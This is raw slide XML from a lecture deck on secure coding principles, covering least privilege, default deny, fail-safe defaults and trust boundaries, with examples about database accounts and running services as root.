                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>only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necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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operational</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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99" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>controls</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1213121" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="185"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1213756" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>CRUD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Create,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Read,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Update,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="17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99" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
            <a:endParaRPr sz="17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93952" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3547950" algn="l"/>
              </a:tabLst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uncommon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	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developers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single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account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works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all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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privilege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levels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9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case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SQL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Injection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vulnerability,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attacker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could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only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perform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those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operations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allowed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normal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users,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only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read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likely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 be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needed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89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6382375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spc="760" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="77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5" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Privilege-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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10224012" cy="3235752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Do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run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local desktop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3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Administrator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user?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not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applying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Least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Privilege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Principle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311691" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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 damage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from executing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malicious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code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will be much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greater than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didn't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170764" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="79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On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*nx,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running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services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as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root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or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with setuid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permission bit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set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has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same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effect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0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unning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th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Apac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 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ser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gives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every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executable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Apache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runs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root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privileges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program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runs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root,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many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it's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normal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defects</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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become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defects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the Database Be Hacked?</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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600" dirty="0"/>
              <a:t>Determine poor procedures and inadequate security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2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600" dirty="0"/>
              <a:t>The ethical hacker has an arsenal of tools to use in attempting to breach the database and website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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332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90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6382375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spc="760" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="77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5" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Privilege-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32268"/>
            <a:ext cx="9945319" cy="2079083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5078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MS-ISAC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2013-112,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Remote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execution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vulnerability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Microsoft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Scripting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Runtime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Library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1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Allows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remote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attacker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run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as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logged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user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634810" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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 are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using this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library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running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 a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reduced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privilege user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199" spc="-67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damages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will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 limited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9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running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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Administrator,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damages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could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much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greater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91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 Coding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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Privilege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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="10198618" cy="4087700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Alias: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Principle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Least Privilege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(POLA),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Minimal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privilege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Forces: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20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Most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users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need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absolute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privilege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their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machine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10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Maximum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privilege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something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attacker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desires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40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is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easy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work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non-admin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user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most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systems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lnSpc>
                <a:spcPts val="2509"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199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Developers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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still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code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applications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require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admin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even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when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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2509"/>
              </a:lnSpc>
            </a:pP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avoided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Consequences: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35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case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breach,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damage is limited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15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Cause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breach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be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analyzed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fixed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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5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Greatly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improved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overall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92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6834994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spc="-5" dirty="0"/>
              <a:t> Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20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5" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>– Tips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1"/>
            <a:ext cx="9772010" cy="2658687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Don’t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share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code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between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privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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levels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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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difficult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do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well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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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small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error can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serious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consequences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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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Check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privilege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level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every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entry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point,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even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if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don’t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think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it’s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entry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point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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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user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get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any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means,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entry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point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Laziness/In-a-hurry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enemies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23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principle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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253418" y="2662754"/>
            <a:ext cx="3082122" cy="146964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23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399" spc="-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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Default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2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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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Privilege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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-3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249" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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249" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Deny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0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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249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Securely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94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 Coding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Use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 Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Deny-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Introduction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312640"/>
            <a:ext cx="9262872" cy="3466197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Principle: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Anything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specifically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allowed must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denied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Corollary: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Default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configurations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most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secure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setting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Assume that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3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denied,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find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conditions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that allow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converse,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finding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reasons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deny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leads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errors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defect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system,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will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deny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access,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grant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3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control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should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default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no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Unless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specifically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allowed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In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event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of an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operation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failure,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do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nothing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restore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state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prior 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attempting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operation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95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 Coding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Use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 Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Deny-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Introduction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332267"/>
            <a:ext cx="10024674" cy="2185736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27297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If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you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attempt to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open a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file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the operation fails, report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it as an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-60" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>error,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don't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try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to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find</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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location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marR="5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815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If an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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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uses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Forceful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Browsing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3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file that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controls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access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administrative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resources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90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2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esou</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-2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shoul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denied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-5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199" spc="-2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Unless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attacker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provide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credentials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96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38742" y="367320"/>
            <a:ext cx="10512862" cy="74359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25393" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pP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 Coding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Principles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  <a:p>
            <a:pPr marL="90143" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pP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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Deny</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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– Security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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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499" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern</a:t>
            </a:r>
            <a:endParaRPr sz="2499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700" y="1267123"/>
            <a:ext cx="10114185" cy="3381764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="77450" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="184730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="610"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pP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Alias: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Fail-Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Defaults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20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Forces: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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="5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Assumptions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often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lead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developers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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create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defaults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too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liberal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20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User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friendliness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lead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errors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judgement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regard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2696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-5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Consequences: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145"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="15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Other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defects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won't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result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breaches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default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is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deny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marR="5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="35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assuming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199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won't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allowed,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attention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focused</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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criteria </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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granting access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355493" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2199" spc="20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Users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often</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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don't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change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default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configurations,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even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look</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="21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at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them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97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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Principles </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-765" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t>Deny</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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12640"/>
            <a:ext cx="10237343" cy="2251124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="32376" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="184730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="254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0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Boundaries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used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motivate this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effort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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Consider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what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criteria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required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to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move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across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45" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust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Boundary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184730" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="509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All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configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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values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that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define</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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resource access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="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designed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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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 one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value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no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lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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spc="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default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unless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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changed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  <a:p>
            <a:pPr marL="527527" lvl="1" indent="-172668" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="135"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="528162" algn="l"/>
              </a:tabLst>
            </a:pP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Users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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>aware</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="21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consequences</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="5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granting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 higher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levels</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="21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5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99" spc="-1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endParaRPr sz="21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648" y="668993"/>
            <a:ext cx="10512862" cy="1253606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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253418" y="2662754"/>
            <a:ext cx="3082122" cy="146964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defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-15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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496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srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Default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2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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-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Privilege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5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dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249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Default</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-6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49" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Deny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  <a:p>
            <a:pPr marL="698290" indent="-342797" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="697656" algn="l"/>
                <a:tab pos="698290" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2249" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-4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249" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Securely</a:t>
            </a:r>
            <a:endParaRPr sz="224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56" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:pPr marL="95856" defTabSz="914126">
                <a:lnSpc>
                  <a:spcPts val="955"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>99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742" y="367320"/>
            <a:ext cx="10512862" cy="761549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25907">
            <a:solidFill>
              <a:srgbClr val="2E5496"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
